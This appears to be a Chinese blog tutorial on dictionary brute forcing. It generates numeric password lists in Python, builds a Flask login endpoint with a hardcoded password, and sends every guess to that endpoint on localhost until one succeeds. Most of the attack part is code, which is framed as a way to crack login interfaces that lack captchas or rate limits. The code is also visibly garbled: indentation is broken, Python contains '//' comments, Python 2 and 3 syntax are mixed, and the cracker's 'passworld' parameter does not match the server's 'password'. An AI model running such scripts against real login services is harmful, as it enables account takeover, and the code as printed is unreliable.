Python - 自导自演 密码字典暴力破解

破解.jpg

简介

• 任何东西都是双面的，包括程序。（攻击方与防御方，相当于矛与盾）

• 密码字典

所谓的密码字典，主要是配合密码破译软件所使用，密码字典里包括许多人们习惯性设置的密码，这样可以提高密码破译软件的密码破译成功率和命中率，缩短密码破译的时间，当然，如果一个人密码设置没有规律或很复杂，未包含在密码字典里，这个字典就没有用了，甚至会延长密码破译所需要的时间

• 暴力破解（穷举法）

穷举法的基本思想是根据题目的部分条件确定答案的大致范围，并在此范围内对所有可能的情况逐一验证，直到全部情况验证完毕。若某个情况验证符合题目的全部条件，则为本问题的一个解；若全部情况验证后都不符合题目的全部条件，则本题无解。穷举法也称为枚举法。

• 我们这里就是采用 密码字典 来做例子。

文章能教会我们什么呢？

• 本文就是教大家如何使用 密码字典 来破解一个没有加验证码的登录接口。

第一步（生成密码字典文件）

• 我这里使用的是 Python 来生成的。

• 先建立一个 .text 的文件
  cd xxx（文件夹路径）
  vi pass.text

• Python 中的 string 可以输出所有的字符
  import string
  print(string.printable)
  输出为：0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[]^_`{|}~
  我们这里实验就使用 所有数字 组成的集合了。

• 这里我们还用到了 itertools 如果想了解它 请点击我

• 创建一个 .py 文件 。把下列代码 copy 进去

import sys
import string
import itertools

  def get_strings():
    chars = string.printable[:10]
    strings = []
    for i in xrange(min, max + 1):
        strings.append((itertools.product(chars, repeat=i),))
    return itertools.chain(*strings)

  def make_dict():
    f = open(file, 'a')
    for x in list_str:
        for y in x:
            f.write("".join(y))
            f.write('\n')
    f.close()
    print()
    'Done'

  while True:
    if len(sys.argv) == 4:
        try:
            min = int(sys.argv[1])
            max = int(sys.argv[2])
        except:
            print()
            "wrong"
            sys.exit(0)
        if min <= max:
            list_str = get_strings()
            file = sys.argv[3]
            make_dict()
            sys.exit(0)  

• 然后通过下列代码生成密码字典
  python xx.py 6(这个是最短长度) 6(这个是最长长度) .text文件路径(存储路径)
  成功后如图所示

  
  
  

  密码字典.png

第二步 （编写登录接口）

• 上一篇文章讲过 如何编写接口了，不懂的可以再去看下。
• 我们在之前的基础上加一步验证（这里就省略了和数据库的交互了，而是直接写一个硬编码）
• 代码如下

 from flask import Flask
from flask import request
from flask import redirect
from flask import current_app

  app = Flask(__name__)

  @app.route('/user/login',methods=['GET'])
  def start():

    // flask 获取 POST 参数
    // print(request.form['yes'])
    // print(request.form['hai'])
   
    //flask获取 GET 参数
    username = request.args.get('username')
    passworld = request.args.get('password')

    if username == 'w123':
    if passworld == '000456':
      return 'ok'
    else:
      return 'error'
    else:
     return'error'

    if __name__ == '__main__':
    app.run()

可以看到上述代码 账户名：w123 密码 000456
逻辑 就是 账户密码正确 输出ok 反之error

第三步 （破解）

• 这里我们使用 Python 的 urllib 模块来模拟 请求
• 具体代码如下：

import urllib
import urllib.request

  f=open("pass.text")
while 1:
    pwd = f.readline().strip()
    if not pwd:
        print('字典已比对完。')
        break

    data = {}

    data['passworld'] = pwd
    data['username'] = 'w123'

    url_parame = urllib.parse.urlencode(data)

    url = "http://127.0.0.1:5000/user/login?"

    all_url = url + url_parame

    data = urllib.request.urlopen(all_url).read()

    record = data.decode('UTF-8')

    if record == 'ok':
        print('破解出来了，密码为',pwd)
        break
    else:
        print('error')

附上一张成功的图片

破解成功.png

到这里就算是OK了，这只是简单的教程。

这里涉及的只是没有加验证码的接口，假如涉及到接口有验证以及有次数限制，那就没办法了。

喜欢就请点个喜欢吧！！！